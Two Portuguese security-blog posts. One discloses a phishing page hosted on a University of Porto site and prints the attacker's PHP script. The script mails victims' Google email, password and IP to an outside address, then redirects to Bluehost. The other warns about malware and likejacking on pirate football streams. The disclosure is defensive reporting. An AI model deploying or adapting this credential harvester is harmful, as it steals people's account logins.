Todos os posts tagados porto

Site da Universidade do Porto aloja página de Phishing

contas_google_phishing

O site do Centro de Educação Médica do Departamento da Faculdade de Medicina da Universidade do Porto – http://cem.med.up.pt está alojar uma página que está a ser utilizada para Phishing de contas do Google.

O endereço afetado continua ativo e foi divulgado na base de dados Clean-MX.

http://cem.med.up.pt/images/banners/Domain/

Dado à possibilidade de listagens de ficheiros do servidor web, é possível descarregar o ficheiro [inserido em 17 de Fevereiro de 2015] utilizado pelo utilizador malicioso, no qual divulgo:

<?php

$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------------------------------------------\n";
$message .= "Email ID: ".$_POST['Email']."\n";
$message .= "Password: ".$_POST['emailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Created By Lord PoPpA-----------------------------\n";

$recipient = "juwonlo7@XXXXXXXXXXX";
$subject = "TRANSACTION LOGIN";
$headers = "From: DOMAIN";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: https://www.bluehost.com/");

}
else
{
echo "ERROR! Please go back and try again.";
}
?>

De referir que o site corre Joomla! e poderá ter sido essa a porta de entrada da intrusão.
Uma cópia desta informação foi enviada ao report @cert.pt para uma possível resolução.

Transmissão online do Porto vs Benfica leva a malware

Transmissão online do Porto - Benfica leva a malware

Fica o alerta para os diversos links de supostas transmissões online do jogo de futebol Porto – Benfica, que irá ser transmitido hoje na Sport TV.
Alguns deles até podem mostrar o jogo mas ao mesmo tempo inundam a página com adware/malware.
Neste tipo de esquemas também já começam aparecer links com Likejacking, onde o utilizador ao clicar no botão Play, também está a Gostar de uma página/link no Facebook para poder ver a transmissão pirata. Desta forma este esquema propaga-se pela lista de amigos da vítima.

Tenham sempre em atenção os links que abrem e verifiquem sempre a sua veracidade.
Fica a dica.